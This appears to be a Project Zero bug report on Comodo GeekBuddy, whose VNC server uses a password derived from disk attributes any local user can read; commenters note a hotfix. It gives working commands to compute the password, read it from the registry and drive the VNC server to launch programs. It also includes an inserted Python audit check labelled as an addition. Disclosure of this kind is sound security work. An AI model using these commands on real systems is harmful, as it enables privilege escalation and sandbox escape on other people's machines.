Fixed
Status Update
Comments
ta...@google.com <ta...@google.com> #2
Update today:
Hello Tavis,
Regarding the vulnerability below, we have issued a hotfix on 10th of February.
GB 4.25.380415.167 has the required fix and 90+% of existing users are updated as of now.
ko...@gmail.com <ko...@gmail.com> #3
Wow, so that's what you meant on Twitter.
That's shady and horribly disappointing. If there was ever a reason to uninstall Comodo, this was it.
Thanks for everything you and Project Zero do. :)
to...@gmail.com <to...@gmail.com> #5
Wow have you read the spin Comodo put on this? "ITS NOT REMOTELY EXPLOITABLE" they claim, completely dismissing responsibility for what is a serious privilege escalation vulnerability.
se...@gmail.com <se...@gmail.com> #6
[Comment Deleted]
[Deleted User] <[Deleted User]> #7
This transcends a simple bug and vulnerability, it is a backdoor.
da...@gmail.com <da...@gmail.com> #8
@tobias, indeed, it's also written after the fact, as though the current state is how it was before.
You can't issue a patch, then claim there wasn't a problem by describing how the software works post-patch.
Description
When you install Comodo Internet Security, in the default configuration an application called "GeekBuddy" is also installed and added to HKLM\System\CurrentControlSet\Services. GeekBuddy is a tech support application that uses a number of questionable and shady tactics to encourage users to pay for online tech support.
As has been noted by numerous people over the last few years, GeekBuddy also installs a VNC server and enables it by default.
e.g.
This is an obvious and ridiculous local privilege escalation, which apparently Comodo believe they have resolved by generating a password instead of leaving it blank. That is not the case, as the password is simply the first 8 characters of SHA1(Disk.Caption+Disk.Signature+Disk.SerialNumber+Disk.TotalTracks). I imagine Comodo thought nobody would bother checking how they generated the password, because this clearly doesn't prevent the attack they claim it solved.
This is also a sandbox escape: it works against the Comodo and Chromodo sandboxes, as well as Chrome, Protected Mode, and other sandboxes.
This information is available to unprivileged users. For example, an unprivileged user can launch calc.exe like this:
$ wmic diskdrive get Caption,Signature,SerialNumber,TotalTracks
Caption SerialNumber Signature TotalTracks
VMware, VMware Virtual S SCSI Disk Device -135723213 1997160
$ printf VMware,VMwareVirtualSSCSIDiskDevice-13572321319971601997160 | sha1sum | cut -c-8
7d4612e5
$ printf "key ctrl-esc\ntype calc.exe\nkey enter\n" | vncdotool -p 7d4612e5 -s localhost::5901 -
I'm using vncdotool from here:
(Note: if there is no SerialNumber field, TotalTracks needs to be repeated twice; I think this is a bug.)
Or alternatively you can pull the password out of HKLM, just truncate it to 8 characters (!!!):
$ reg query HKLM\System\Software\COMODO\CLPS\ 4\CA /v osInstanceId
HKEY_LOCAL_MACHINE\System\Software\COMODO\CLPS 4\CA
osInstanceId REG_SZ 7d4612e59b27e4f19fc3d8e3491fb3bb879b18f3
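The following audit check is an added example, not code from the report or from Comodo. It reproduces the derivation described above against the report's own sample values and reports whether a stored osInstanceId still begins with the value derivable from disk attributes any local user can read; stripping whitespace from the Caption is inferred from the printf command and is an assumption.

```python
import hashlib
import re

# Sample values constructed from the wmic and reg output quoted in this report.
SAMPLE_DISK = {
    "Caption": "VMware, VMware Virtual S SCSI Disk Device",
    "SerialNumber": "",            # empty in the report's VM
    "Signature": "-135723213",
    "TotalTracks": "1997160",
}
SAMPLE_OS_INSTANCE_ID = "7d4612e59b27e4f19fc3d8e3491fb3bb879b18f3"


def _squash(value: str) -> str:
    # The report's printf carries the Caption without its spaces; treating
    # "strip all whitespace" as the rule is an assumption, not confirmed by the page.
    return re.sub(r"\s+", "", value)


def derive_weak_password(disk: dict) -> str:
    """First 8 hex chars of SHA1(Caption+Signature+SerialNumber+TotalTracks).

    When SerialNumber is empty, TotalTracks takes its place, so it appears
    twice, matching the quirk the report notes.
    """
    serial = disk.get("SerialNumber") or disk["TotalTracks"]
    material = "".join(_squash(part) for part in (
        disk["Caption"], disk["Signature"], serial, disk["TotalTracks"]))
    return hashlib.sha1(material.encode()).hexdigest()[:8]


def uses_predictable_password(disk: dict, os_instance_id: str) -> bool:
    """Audit check: True if the stored osInstanceId still begins with the value
    derivable from attributes any local user can read, i.e. the host is still on
    the weak scheme; a fixed build should store a value not derivable this way."""
    return os_instance_id.strip().lower().startswith(derive_weak_password(disk))


if __name__ == "__main__":
    print(derive_weak_password(SAMPLE_DISK))                              # 7d4612e5
    print(uses_predictable_password(SAMPLE_DISK, SAMPLE_OS_INSTANCE_ID))  # True
```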
Screenshot attached for reference.
It feels like there might be a way to make this remote, perhaps via dns-rebinding and websockets.
This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.